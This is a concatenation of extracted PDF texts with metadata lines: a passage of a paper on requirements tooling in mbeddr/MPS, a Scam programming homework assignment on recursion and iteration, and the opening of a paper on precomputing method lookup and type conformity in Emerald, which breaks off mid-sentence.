the components. Finally, arguments to capabilities can only be taken from the data that is owned by the client component, or has been received from another capability call during that same scenario. As a consequence, after defining a set of scenarios, the components accumulate data, capabilities and collaborators that are necessary to execute the scenarios: a functional architecture arises, "enforced" by the underlying language and its constraints. Figure 5. A scenario that describes exemplary interactions between collaborating components (and external actors). **Visualization** Scenarios are reminiscent of sequence diagrams, so they can also be visualized this way (see Figure 6). To make this possible, we have integrated PlantUML4 into mbeddr – the diagram is rendered directly in the tool, and a double-click on a diagram element selects the underlying element in the editor. Additional diagrams show the components, their data items and capabilities and the collaborations. Another language extension supports defining use cases, and use case diagrams can be rendered from these. The use case attributes are extensible. **Extensibility** This language for expressing the functional architecture does not have expressions, sophisticated data types or a type checker. At this level of abstraction, these would be distractions – the goal of this language is the allocation of data, responsibilities and collaborations to high-level functional building blocks of an application. However, the language is extensible: new entities (in addition to components or actors) can be defined; components can own additional things (in addition to data items and capabilities) and scenarios can contain additional steps (in addition to capability calls, headings, or alternatives). For example, a component may contain a wireframe mockup (which would have to be drawn outside of MPS) to represent UI aspects. It is also possible to add additional properties and then check constraints based on these. For example, components may be allocated to layers, and constraints can be used to check whether collaborations and capability usages respect layer constraints (e.g., you can call from the business layer into the persistence layer, but not vice versa). These additional data and constraints can be added without invasively changing the basic scenario language, and can also be added after the initial set of components and scenarios have been defined, supporting incremental refinement of the language as we incrementally refine our understanding of the system. For example, systems engineers may first define the components and the scenarios. Then, in a second step, software architects may add the layer markup and the associated constraints, and then, if some of the constraints fail, split up or reallocate components to make them fit with the layer structure. Refactorings can be added to make such changes to the component structure simpler. D. Tracing into other Artifacts In many projects, requirements are not the last step before coding, and the functional architecture discussed in the previous section is too simplistic to describe the functionality of the system. Instead, other artifacts are developed, including system engineering models, function models or physical models. Often these models are built with tools such as Matlab/Simulink5 or Modelica6, or use formalisms such as EAST-ADL7. It is usually not possible to automatically derive software artifacts from such models, since they are 5http://www.mathworks.com 6https://www.modelica.org 7http://www.east-adl.info/ too abstract. However, as software artifacts are developed, it is necessary to relate the software artifacts to these models. To make this possible, mbeddr’s tracing framework is extensible: Other artifacts can be used as requirements targets as well (as long as the respective language constructs implement an mbeddr-provided interface). This way, arbitrary descriptions or models (such as system models, functional models or component models) can be traced to. By adding an import facility, models created with other engineering tools can be integrated reasonably well with mbeddr-based artifacts. For example, we are currently implementing an importer for Matlab/Simulink models to support tracing to simulink blocks from mbeddr program nodes. E. Formal Business Logic in Requirements The previous two subsections have addressed the challenge of becoming "more formal" with the goal of narrowing down the functional architecture of a system. Another way of getting incrementally closer to the implementation is to embed important parts of the business logic into requirements, and then use those in the implementation code. Figure 7. A calculation is a function embedded into a requirement. They include test cases that allow “business people” to play with the calculations. An interpreter evaluates tests directly in the IDE for quick turnaround. Figure 7 shows two requirements. The first one defines a constant BASE_POINTS with the type int8 and the value 10. The second requirement defines a calculation PointsForATrackpoint. A calculation has a name, a list of parameters, and a result expression, which, in this case, uses decision table (a two-dimensional representation of nested if-statements8). The calculation also references the BASE_POINTS constant. Using constants and calculations, business users can formally specify some important business data and rules, while not having to deal with the actual implementation of the overall system. To help with getting these data and rules correct, calculations also include test cases. These are evaluated directly in the IDE, using an interpreter: users can directly “play” with the calculations. CONNECTING TO CODE If the constants and calculations that business users specify in the requirements were only used in requirements, this would be only partially useful. In the end, these calculations should make their way into the code directly, without manual re-coding. Figure 8. Implementation code can directly call function calculations defined in requirements. In this case, a calculation is called from a component, expressed in the mbeddr’s components C extension. Figure 8 shows a component, expressed in mbeddr’s component extension to C. Inside the component we directly invoke a calculation (the green code), using function call syntax. When this code is translated to C, the expression in the calculation is translated into C and inlined. The constant and the calculation are just examples of possible "plug in" languages into mbeddr’s requirements system. Any DSL, using a wide range of business user-friendly notations, can be plugged in and made available to C-based implementations. III. DISCUSSION The tooling described in this paper solves some important challenges in requirements engineering. However, it is not a complete solution (yet). For example, some contexts require information security or multi-client capability for the requirements. This is currently not addressed. Also, it is assumed that all artifacts reside in MPS, which limits the applicability of the approach. However, it is our opinion – and the core message of this paper – that any engineering tool should always be based on a language workbench like MPS that supports approaches like the one discussed in this paper. Another limitation is that no integration with current trends such as OSLC9 (Open Services for Lifecycle Collaboration) is provided. Finally, this paper only addresses the overall paradigm and tooling, it does not discuss a methodology for requirements management. In our opinion these two concerns are largely orthogonal: once a tool is as powerful and extensible as mbeddr/MPS, it can be adapted to many different methodologies or processes. It could be argued that the high-level components and scenarios discussed in Section II-C, as well as the formal business logic discussed in Section II-E are not requirements anymore, but rather architecture or design. However, we think that this distinction is arbitrary and not very helpful, especially in the context of a tool such as the one described in this paper: there has to be some consistent and integrated 8Projectional editors like MPS can deal with non-textual notations such as tables, vectors, matrices or fraction bars or "big sum" symbols. 9http://open-services.net/ path from prose requirements to the implementation code. The tooling discussed in this paper provides such a path. It is not important at which point is this continuum we stop calling the activity "requirements engineering". IV. RELATED WORK As mentioned in the introduction, Winkler and von Pilgrim [5] performed a literature review on traceability, considering it both for MDD and requirements. They conclude that tracing is rarely used in practice and the most prominent problem leading to this is the lack of proper tool support. Our approach provides a possible solution to this dilemma and could therefore contribute to helping practitioners in adopting requirements traceability, particularly, in contexts where the process requires it. DSLs have traditionally not seen much use in requirements engineering, they are typically associated more with the implementation phase or with software architecture. However, as we demonstrate in this paper, DSLs, especially extensible DSLs, can be very useful in requirements engineering. Other tools, for example, itemis’ Yakindu Requirements also implement this idea: it also uses (mostly) textual DSLs plus visualization. In contrast to our approach, however, extensibility is more limited, since the underlying language workbench (Eclipse XText) supports only limited forms of language extension. Favaro et al. [1] present an approach to requirements engineering that has some commonalities with ours. Like us, they have the goal to introduce structured, model-based requirements. Their approach relies on the use of a wiki enriched by semantic links, and they also provide a requirements browser inside the IDE (Eclipse) supporting some navigation capabilities from the requirement to the artifact (but not vice versa). They underline two points with which we strongly agree: a) the importance of having an adaptable mechanism for requirements, depending not only on the nature of the project but also on the kind of the requirement, with a lighter process for "non-technical" requirements; b) the fact that requirements and implementation artifacts are intrinsically integrated. We think, however, that our approach offers: a) better integration between requirements and artifacts, and b) the possibility to have both a flexible approach but also specific IDE support for any particular kind of formal language embedded into the requirements (thanks to the projectional editor). V. FUTURE WORK There are three main areas for future work. First, we will add reporting functionality, targetting requirements documents in HTML and Latex. The reports will include the diagrams, as well as trace reports. Another target is Excel, which is often the preferred way to get "numbers" by management. Second, a colleague of ours is currently working on an MPS editor component that supports mixing free text (with text-like editing support) and instances of language concepts. Integrating this editor with the requirements management tooling discussed in this paper will be extremely useful: for example, one could reference other requirements from within the prose description of a particular requirement, while making sure that this reference would take part in refactorings. VI. SUMMARY mbeddr’s core idea is discussed in [3]: building domain-specific tools is not just about adapting a tool to a particular domain (windows, buttons, tool bars). It is rather more important to adapt to the domain the languages, formalisms and data formats that underlie the tool. If you do this based on a language workbench, you get the tool adaptation essentially for free. This is because the actual tool, JetBrains MPS, is essentially a very powerful editor for any kind of language. By adapting the language, you get the adapted tool automatically. In this paper, we have demonstrated this idea for requirements management. All the benefits discussed in this paper involve only language engineering. No tool aspects have been customized. ACKNOWLEDGEMENTS We thank the mbeddr and MPS development teams for creating an incredibly powerful platform that can easily accomodate the features described in this paper. We would also like to thank Christoph Becker for making us aware of PlantUML and inspiring the scenario extension to requirements. We also want to thank Andreas Graf and Nora Ludewig for their feedback to the paper. REFERENCES 10http://www.yakindu.de/requirements/ 11http://eclipse.org/xtext
{"Source-Url": "https://confluence.jetbrains.com/download/attachments/54338465/voeltertomassetti-requirementsinmbeddr.pdf?api=v2&modificationDate=1412871214000&version=1", "len_cl100k_base": 5270, "olmocr-version": "0.1.51", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 18381, "total-output-tokens": 5872, "length": "2e12", "weborganizer": {"__label__adult": 0.0002646446228027344, "__label__art_design": 0.0002701282501220703, "__label__crime_law": 0.00023090839385986328, "__label__education_jobs": 0.0004897117614746094, "__label__entertainment": 4.661083221435547e-05, "__label__fashion_beauty": 0.00012218952178955078, "__label__finance_business": 0.0002415180206298828, "__label__food_dining": 0.0002689361572265625, "__label__games": 0.00036406517028808594, "__label__hardware": 0.0005898475646972656, "__label__health": 0.0003006458282470703, "__label__history": 0.00015151500701904297, "__label__home_hobbies": 5.745887756347656e-05, "__label__industrial": 0.00031113624572753906, "__label__literature": 0.00018966197967529297, "__label__politics": 0.00016939640045166016, "__label__religion": 0.0003459453582763672, "__label__science_tech": 0.0104217529296875, "__label__social_life": 6.80088996887207e-05, "__label__software": 0.005126953125, "__label__software_dev": 0.97900390625, "__label__sports_fitness": 0.00023674964904785156, "__label__transportation": 0.00037169456481933594, "__label__travel": 0.0001455545425415039}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 28256, 0.00897]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 28256, 0.55721]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 28256, 0.92691]], "google_gemma-3-12b-it_contains_pii": [[0, 4665, false], [4665, 9093, null], [9093, 14019, null], [14019, 18049, null], [18049, 22860, null], [22860, 28256, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4665, true], [4665, 9093, null], [9093, 14019, null], [14019, 18049, null], [18049, 22860, null], [22860, 28256, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 28256, null]], "pdf_page_numbers": [[0, 4665, 1], [4665, 9093, 2], [9093, 14019, 3], [14019, 18049, 4], [18049, 22860, 5], [22860, 28256, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 28256, 0.0]]}
olmocr_science_pdfs
2024-12-04
2024-12-04
55b2c9986dca317413badc3634327b5720ff7fd1
Preliminary information This is your first Scam assignment. To run your code, use the following command: ```sh scam assign1.scm ``` At the top of your assignment, place a definition similar to the following: ```scm (define (author) (println "AUTHOR: Rita Recursion rrita@crimson.ua.edu") ) ``` with the name and email replaced by your own name and email. Define this function as well, to help with testing your code: ```scm (define (exprTest # $expr target) (define result (catch (eval $expr #))) (if (error? result) (println $expr " is EXCEPTION: " (result'value) " (it should be " target ")") (println $expr " is " result " (it should be " target ")") ) ) ``` For each numbered task (unless otherwise directed), you are to provide a function with a name of the form `runN`, with the `N` corresponding to the task number, starting at one (as in `run1`, `run2`, etc.). This function is in addition to all other requested functions. These `run` functions will test your implementation and are to take no arguments. For example, if task 5 is: 5. Implement factorial so that it implements a recursive process. Name your function `fact`. you should provide a `run` function similar to: ```scm (define (run5) (exprTest (fact 0) 1) (exprTest (fact 3) 6) ... ) ``` Woe betide students who provide insufficient testing should their implementations prove to be incorrect! If you do not complete an exercise, do not provide a `run` function for that exercise. If you omit the `run` function corresponding to an exercise, it will be assumed that you are skipping that part and you will receive no credit for that exercise. When you have completed testing of your run functions, comment out any calls to them (but do not comment out the definitions). I will provide a test script which performs minimal testing of your implementation. If your program does not pass the provided test script without failing, I will not grade your exercise and you will receive zero credit for the assignment. If your program passes the provided test script, it will be graded with a more thorough set of tests. It may be of use to know that you can have actual tabs and newlines within a string, as in: ```scm (println "The quick brown fox m u j e d over the lazy dog") ``` which will print out as: The quick brown fox over the lazy dog Another useful function for your run function is inspect. Here is an example usage: (inspect (+ 2 3)) which produces the output: (+ 2 3) is 5 You may not use assignment (assign or set!) in any of the code you write. Nor may you use any looping function such as while or for. You may not use list or arrays. Tasks 1. Explain why if and my-if (defined below) can behave differently for equivalent, legal inputs. Here is an example of equivalent calls to if and my-if that behave exactly the same, in terms of output: (define x 2) (define a (readInt)) (inspect (if (= a 0) x (/ a x))) (inspect (my-if (= a 0) x (/ a x))) where my-if is defined as (define (my-if a b c) (if (true? a) b c) ) In particular, give a concrete example in which the behavior is different. You will need to come up with specific cases that show this difference. Your run function should present this example and should explain precisely why the behavior is different. 2. Define a function, named zeno_cost, that computes the price of a ticket for Zeno’s Airlines given the distance d of the flight in stadia, the cost c of the first half of the trip in drachma, and a factor f for computing the cost of the rest of the trip. The total cost of a ticket is computed as follows: c drachma for the first half of the trip and \( c \times f \) drachma for the first half of the remaining half. Of the part of the trip that still remains, the first half of that is \( c \times f \times f \) drachma. Indeed, the first half of the remaining portion is always \( f \) times the cost of the previous portion. If the distance to be traveled is less than or equal to a daktylos (there are 9,600 daktylos to 1 stadion), then the cost of traveling that distance a fixed cost of 7 drachma. Otherwise, if the cost of traveling half the distance to be traveled is less than or equal to a hemiobol (one-twelfth of a drachma), the cost of traveling the two halves is one hemibool. Your zeno_cost function should implement a recursive process. Expect real or integer numbers as arguments. Return the cost (a real number) in drachma. 3. The Mandelbrot set (for examples, see [link](http://www.softlab.ece.ntua.gr/miscellaneous/mandel/mandel.html)) is a set of planar points, a point \((x, y)\) being in the set if the following iteration never diverges to infinity: \[ \begin{align*} r &= r^2 - s^2 + x \\ \text{and} \quad s &= 2 \times r \times s + y \end{align*} \] with \(r\) and \(s\) both starting out at 0.0. While we can’t iterate forever to check for divergence, there is a simple condition which predicts divergence: if \(r \times r + s \times s > 4\) is ever true, either \(r\) or \(s\) will tend to diverge to infinity. Processing of a point continues until divergence is detected or until some threshold number of iterations has been reached. If the threshold is reached, the point is considered to be in the Mandelbrot set. Obviously, the higher the threshold, the higher the confidence that the point actually is in the set. The points not in the Mandelbrot set can be categorized as to their resistance to divergence. These points are often colorized, a point colored black if it is in the set, red if it is very resistant to divergence, blue if it immediately diverges, and somewhere in between red and blue for intermediate resistance. Define a function, named `mandelbrot-iter`, that takes a threshold as its single argument, and returns another function that can be used to test whether or not a point is in the Mandelbrot set using the given threshold. The returned function takes two arguments, the x-coordinate, and the y-coordinate of the point to be tested and it returns the resistance (i.e., the number of iterations until the divergence test succeeds). The return value should be 0 if the point described by the x- and y-coordinates is in the Mandelbrot set (i.e., reaches the threshold). You should test for divergence before you test for reaching the threshold. Example usage: ```scheme (define mandelbrot-tester (mandelbrot-iter 100)) (if (= (mandelbrot-tester 2 3) 0) (print "point (2,3) is in the Mandelbrot set!\n") (print "point (2,3) is not in the Mandelbrot set.\n") ) ``` In the above example, the threshold for determining whether or not a number is in the Mandelbrot set is 100. 4. Define a function named `root3` which uses a binary search algorithm to find the cube root a given number. Your function should return the current approximation when the current approximation is indistinguishable from the previous approximation. Your function need only work for non-negative numbers. 5. Define a function, named `crazyTriangle`, that prints out \(n\) levels of Pascal’s triangle, but with a twist. The leftmost and rightmost numbers at each level are not necessarily ones, as with Pascal’s triangle, but are given as the first and second arguments. The third argument is the number of levels to be printed. The output produced by `(crazyTriangle 1 1 6)` would be Pascal’s triangle: ``` 1 1 1 1 2 1 1 3 3 1 1 4 6 4 1 1 5 10 10 5 1 ``` The output produced by `(crazyTriangle 1 2 6)` would be ``` 1 1 2 1 3 2 1 4 5 2 1 5 9 7 2 1 6 14 16 9 2 ``` Note that the apex is always the first argument. Your function must print one level to a line with lower levels above upper levels. Your levels need to be centered around the apex (but don’t worry if the triangle skews rightward with multi-digit numbers). Your function must also minimize any redundant computations and should not overflow an integer while computing a triangle entry (unless the entry itself overflows). 6. Currying is the process of providing the arguments to a function at different points in time. The result of currying a function is a new function that accepts the last of the remaining, unspecified arguments. Define a function, named oppy, that curries a mathematical expression of two binary operators. As an example, these two expressions should evaluate to the same result: \[ (+ \ x \ (\ast \ y \ z)) \] \[ (((\text{oppy} \ (+)) \ x \ (\ast)) \ y) \ z) \] Note that \(y\) and \(z\) could be instantiated far later than \(x\). Your implementation will only be tested on expressions of the form given above. 7. The function \(w\), described below, implements Shank’s transform: \[ \begin{align*} \text{if } i \text{ is zero} & \quad w(f, i) = f(i) \\ \text{otherwise} & \quad w(f, i) = \frac{S(f, 2i) \times S(f, i-1) - S(f, i)^2}{2 \times S(f, i) + S(f, i-1)} \end{align*} \] where the function \(S\) implements summation: \[ S(f, n) = \sum_{i=0}^{n} f(i) \] Implement \(w\) and \(S\) using an iterative process with no redundant computations. 8. The ancient Egyptians were perhaps the first people on earth to come up with the idea of binary arithmetic when they developed their method of multiplication. The Egyptian Multiplication method is a tabular calculation that lends itself to a straightforward computer implementation. The table starts out with a 1 in column \(a\), the multiplicand in column \(b\) and the multiplier in column \(c\). Columns \(a\) and \(c\) are successively doubled until the value in column \(a\) is greater than the value in column \(b\). For example, to multiply 1960 by 56, we generate the following table: <p>| | | | |</p> <table> <thead> <tr> <th></th> <th></th> <th></th> <th></th> </tr> </thead> <tbody> <tr> <td>1</td> <td>56</td> <td>1960</td> <td></td> </tr> <tr> <td>2</td> <td>56</td> <td>3920</td> <td></td> </tr> <tr> <td>4</td> <td>56</td> <td>7840</td> <td></td> </tr> <tr> <td>8</td> <td>56</td> <td>15680</td> <td></td> </tr> <tr> <td>16</td> <td>56</td> <td>31360</td> <td></td> </tr> <tr> <td>32</td> <td>56</td> <td>62720</td> <td></td> </tr> <tr> <td>64</td> <td>56</td> <td>125440</td> <td></td> </tr> </tbody> </table> At this point, we add a fourth column initialized to zero and apply the following algorithm. If the number in column \(a\) is less than or equal to that of column \(b\), we add column \(c\) to column \(d\) and subtract column \(a\) from column \(b\). Otherwise, we leave the values in \(b\) and \(d\) unchanged. In either case, we halve (integer division) the values in both columns \(a\) and \(c\). We stop when column \(b\) becomes zero. At this point, the answer resides in column \(d\). ``` <p>| | | | |</p> <table> <thead> <tr> <th></th> <th></th> <th></th> <th></th> </tr> </thead> <tbody> <tr> <td>64</td> <td>56</td> <td>125440</td> <td>0</td> </tr> <tr> <td>32</td> <td>56</td> <td>62720</td> <td>0</td> </tr> <tr> <td>16</td> <td>24</td> <td>31360</td> <td>62720</td> </tr> <tr> <td>8</td> <td>8</td> <td>15680</td> <td>94080</td> </tr> <tr> <td>4</td> <td>0</td> <td>7840</td> <td>109760</td> </tr> </tbody> </table> ``` Define a function named \(egypt^*\) that takes two arguments, the multiplicand and the multiplier and returns the product. Example call: \[ (egypt^* \ 56 \ 1960) ;\text{multiply 56 by 1960 (with no multiplication)} \] \[ (halve 56) ;\text{divide 56 by 2 (with no division)} \] Your method should implement an iterative process for both \(egypt^*\) and \(halve\). You may not use either multiplication or division in your solution. The \(halve\) function must run in sub-linear time. 9. Consider this infinite fraction: \[ 1 + \frac{1}{1 + \frac{1}{2 + \frac{1}{1 + \frac{1}{2 + \cdots}}}} \] Define a function called \textit{mystery} that when given an integer argument \(n\), computes the value of this equation to \(n\) terms. For example, if \(n\) is 0, the function should return 1. For \(n\) equal to 1, it should return \(1 + \frac{1}{1}\) or 2. For \(n\) equal to 2, it should return \(1 + \frac{1}{1 + \frac{1}{2}}\) or \(\frac{5}{3}\). The return value should be cast to a real number. Your function should compute its value using a recursive process. Your \textit{run} function should give the value of the equation with an infinite number of terms. 10. The famous Indian mathematician, Ramanujan, asked a question that no one else seemed to be able to solve: what is the value of: \[ \sqrt{1 + 2 \cdot \sqrt{1 + 3 \cdot \sqrt{1 + 4 \cdot \sqrt{1 + 5 \cdot \sqrt{1 + \cdots}}}}} \] carried out to infinity? Instead of answering this question, Ramanujan, gave a solution to the more general problem, the value of: \[ \sqrt{1 + x \cdot \sqrt{1 + (x + 1) \cdot \sqrt{1 + (x + 2) \cdot \sqrt{1 + (x + 3) \cdot \sqrt{1 + \cdots}}}}} \] carried out to infinity. Define a function, named \textit{ramanujan}, which takes as its two arguments the depth of a rational approximation to the above nested expression (as before) and the value of \(x\). For example, if the depth is 0 and \(x\) is 3, \textit{ramanujan} should return 0. If the depth is 1 and \(x\) is 3, \textit{ramanujan} should return the value of \(\sqrt{1 + 3}\). If the depth is 2 and \(x\) is 3, the return value should be the value of \(\sqrt{1 + 3 \cdot \sqrt{1 + 4}}\). Your function should implement a recursive process. Define a second function, named \textit{iramanujan}, with the same semantics but implementing an iterative process. Your \textit{run} function should give the value of the above expression in terms of \(x\). \textbf{Assignment submission} The entire assignment should be contained in a single file named \texttt{assign1.scm}. Any explanatory text should be in the form of Scam comments, which begin with a semicolon. The file should load into the Scam interpreter cleanly. The last line of your file should be: \begin{verbatim} (println "assignment 1 loaded!" \end{verbatim} If you do not see the message "assignment 1 loaded" when executing your file with the Scam interpreter, then there is an error somewhere that needs to be fixed. If your file does not load properly (i.e. I do not see the message), you will receive no credit for your work. To submit assignments, you need to install the \textit{submit} system: - \texttt{linux and cygwin instructions} - \texttt{mac instructions} Now delete extraneous files from your working directory. Finally, while in your working directory, type the command: ``` submit proglan lusth assign1 ``` The \textit{submit} program will bundle up all the files in your current directory and ship them to me. Thus it is very important that only the files related to the assignment are in your directory (you may submit test cases and test scripts). This includes subdirectories as well since all the files in any subdirectories will also be shipped to me, so be careful. You may submit as many times as you want before the deadline; new submissions replace old submissions.
{"Source-Url": "http://beastie.cs.ua.edu/proglan/assign1.pdf", "len_cl100k_base": 4131, "olmocr-version": "0.1.49", "pdf-total-pages": 5, "total-fallback-pages": 0, "total-input-tokens": 14167, "total-output-tokens": 4426, "length": "2e12", "weborganizer": {"__label__adult": 0.0005254745483398438, "__label__art_design": 0.0007257461547851562, "__label__crime_law": 0.0006532669067382812, "__label__education_jobs": 0.03753662109375, "__label__entertainment": 0.00017654895782470703, "__label__fashion_beauty": 0.00025963783264160156, "__label__finance_business": 0.0003871917724609375, "__label__food_dining": 0.00101470947265625, "__label__games": 0.0015726089477539062, "__label__hardware": 0.00189208984375, "__label__health": 0.0006508827209472656, "__label__history": 0.0005631446838378906, "__label__home_hobbies": 0.0004243850708007813, "__label__industrial": 0.0008001327514648438, "__label__literature": 0.0007920265197753906, "__label__politics": 0.0004496574401855469, "__label__religion": 0.0008349418640136719, "__label__science_tech": 0.035186767578125, "__label__social_life": 0.0003771781921386719, "__label__software": 0.01136016845703125, "__label__software_dev": 0.90234375, "__label__sports_fitness": 0.0005335807800292969, "__label__transportation": 0.000675201416015625, "__label__travel": 0.0002846717834472656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 14383, 0.08023]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 14383, 0.54187]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 14383, 0.85507]], "google_gemma-3-12b-it_contains_pii": [[0, 2327, false], [2327, 4551, null], [4551, 8035, null], [8035, 11045, null], [11045, 14383, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2327, true], [2327, 4551, null], [4551, 8035, null], [8035, 11045, null], [11045, 14383, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 14383, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 14383, null]], "pdf_page_numbers": [[0, 2327, 1], [2327, 4551, 2], [4551, 8035, 3], [8035, 11045, 4], [11045, 14383, 5]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 14383, 0.08556]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
9604957022e4d7c78827c3a2ea24960e96f57cee
Precomputing method lookup Jul, Eric Publication date: 2009 Document version Peer reviewed version Citation for published version (APA): Abstract. This paper looks at Method Lookup and discusses the Emerald approach to making Method Lookup more efficient by precomputing method lookup as early as possible — even moving it back into the compilation phase, if possible, thus eliminating method lookup entirely for many simple procedure calls. 1 Introduction 1.1 Original Motivation Smalltalk has been a very influential language. However, some of its features designed for flexibility, were also hard to implement efficiently. We believe that at least some of Smalltalk’s performance problems are caused by the absence of static typing: If only the compiler had more information available to it about the set of operations that can be invoked on an object, it could surely optimize the process of finding the right code, i.e., performing method lookup. This inspired the designers of the programming language Emerald [1] to design a mechanism for making Method Lookup more efficient. In the following, we describe this mechanism which was successful in eliminating most Method Lookup in Emerald. Subsequent advances such as inline caches have largely eliminated the “lookup penalty”. 1.2 Abstract and Concrete Types From our experience with Eden, we knew that a distributed system was never complete: it was always open to extension by new applications and new objects. Today, in the era of the Internet, the fact that the world is “under construction” has become a cliché, but in the early 1980s the idea that all systems should be extensible — we called it the “open world assumption” — was new. A consequence of this assumption is that an Emerald program needed to be able to operate on objects that do not exist at the time that the program was written, and, more significantly, on objects whose type is not known when the application was written. How could this be? Clearly, an application must have some expectations about the operations that could be invoked on a new object, otherwise the application could not hope to use the object at all. If an existing program P had minimal expectations of a newly injected object, such as requiring only that the new object accept the run invocation, many objects would satisfy those expectations. In contrast, if another program Q required that the new object understand a larger set of operations, such as redisplay, resize, move and iconify, fewer objects would be suitable. We derived most of Emerald’s type system from the open world assumption. We coined the term **concrete type** to describe the set of operations understood by an actual, concrete object, and the term **abstract type** to describe the declared type of a piece of programming language syntax, such as an expression or an identifier. The basic question that the type system attempted to answer was whether or not a given object (characterized by a concrete type) supported enough operations to be used in a particular context (characterized by an abstract type). Whenever an object was bound to an identifier, which could happen when any of the various forms of assignment or parameter binding were used, we required that the concrete type of the object **conform** to the abstract type declared for the identifier. In essence, conformity ensured that the concrete type was “bigger” than the abstract type, that is, the object understood a superset of the required operations, and that the types of the parameters and results of its operations also conformed appropriately. Basing Emerald’s type system on conformity distinguished it from contemporary systems such as CLU, Russell, Modula-2, and Euclid, all of which required equality of types. It also distinguished Emerald’s type system from systems in languages like Simula that were based on subclassing, that is, on the ancestry of the object’s implementation. In a distributed system, the important questions are not about the implementation of an object (which is what the subclassing relation captures) but about the operations that it implements. ### 1.3 Type Checking and Binding of Types Another consequence of the open world assumption was that sometimes type checking had to be performed at run time, for the very simple reason that neither the object to be invoked nor the code that created it existed until after the invoker was compiled. This requirement was familiar to us from our experience with the Eden Programming Language [2]. However, Eden used completely different type systems (and data models) for those objects that could be created dynamically and those that were known at compile time. For Emerald, we wanted to use a single consistent object model and type system. Herein lies an apparent contradiction. By definition, compile-time type checking is done at compile time, and an implementation of a typed language should be able to guarantee at compile time that no type errors will occur. However, there are situations where an application must insist on deferring type checking, typically because an object with which it wishes to communicate will not be available until run time. Our solution to this dilemma provided for the consistent application of conformity checking at either compile time or run time. If enough was known about an object at compile time to guarantee that its type conformed to that required by its context, the compiler certified the usage to be type-correct. If not enough was known, the type-check was deferred to run time. In order to obtain useful diagnostics, we made the design decision that such a deferral would occur only if the programmer requested it explicitly, which was done using the `view...as` primitive, which was partially inspired by qualification in Simula 67 [3,4]. Consider the example ```plaintext var unknownFile: File r ← (view unknownFile as Directory).Lookup("README") ``` Without the `view...as Directory` clause, the compiler would have indicated a type error, because `unknownFile`, as a `File`, would not understand the `Lookup` operation. With the clause, the compiler treated `unknownFile` as a `Directory` object, which would understand `Lookup`. In consequence, `view...as` required a dynamic check that the type of the object bound to `unknownFile` did indeed conform to `Directory`. Thus, successfully type-checking an Emerald program at compile time did not imply that no type errors would occur at run time; instead it guaranteed that any type errors that did occur at run time would do so at a place where the programmer had explicitly requested a dynamic type check. The `view...as` primitive later appeared in C++. Note that `view...as` is similar to casting in Java in that the interface view changes. However, in terms of type system and implementation, there is a substantial difference: Java does not check the types when casting but merely that the class of the casted object implements the specified interface (or an interface that inherits the specified interface). In Emerald, the `implements` relationship is not defined by a syntactic construct but rather implicitly by conformity: Any object that has the operations specified by the interface (Abstract Type) implements the interface. Partially inspired by the `inspect` statement of Simula 67 \[3,4\], we also introduced a Boolean operator that returned the result of a type check. This allowed a programmer to check for conformity before attempting a `view...as`. ### 1.4 Operation Invocation A performance problem plaguing object systems, e.g., Smalltalk, that were contemporary with Emerald was the cost of finding the code to execute when an operation was invoked on an object. This process was then generally known by the name “method lookup”; indeed it still is, in Emerald it is called operation invocation. In Smalltalk, method lookup involved searching method dictionaries starting at the class of the target object and continuing up the inheritance class hierarchy until the code was located. We thought that if Emerald didn’t do static type checking, each operation invocation would require searching for an implementation of an operation with the correct name, which would be expensive — although, because we did not provide inheritance, not as expensive as in Smalltalk. In a language like Simula in which each expression had a static type that uniquely identified its implementation, each legal message could be assigned a small integer and these integers could be used as indices into a table of pointers to the code of the various methods. In this way, Simula was able to use table lookup rather than search to find a method (and C++ still does so). We though that static typing would give Emerald the same advantage, and this was one of the motivations for Emerald's static type system. However, even with static typing, there is still a problem in Emerald: except for the above-mentioned primitive types, knowing the 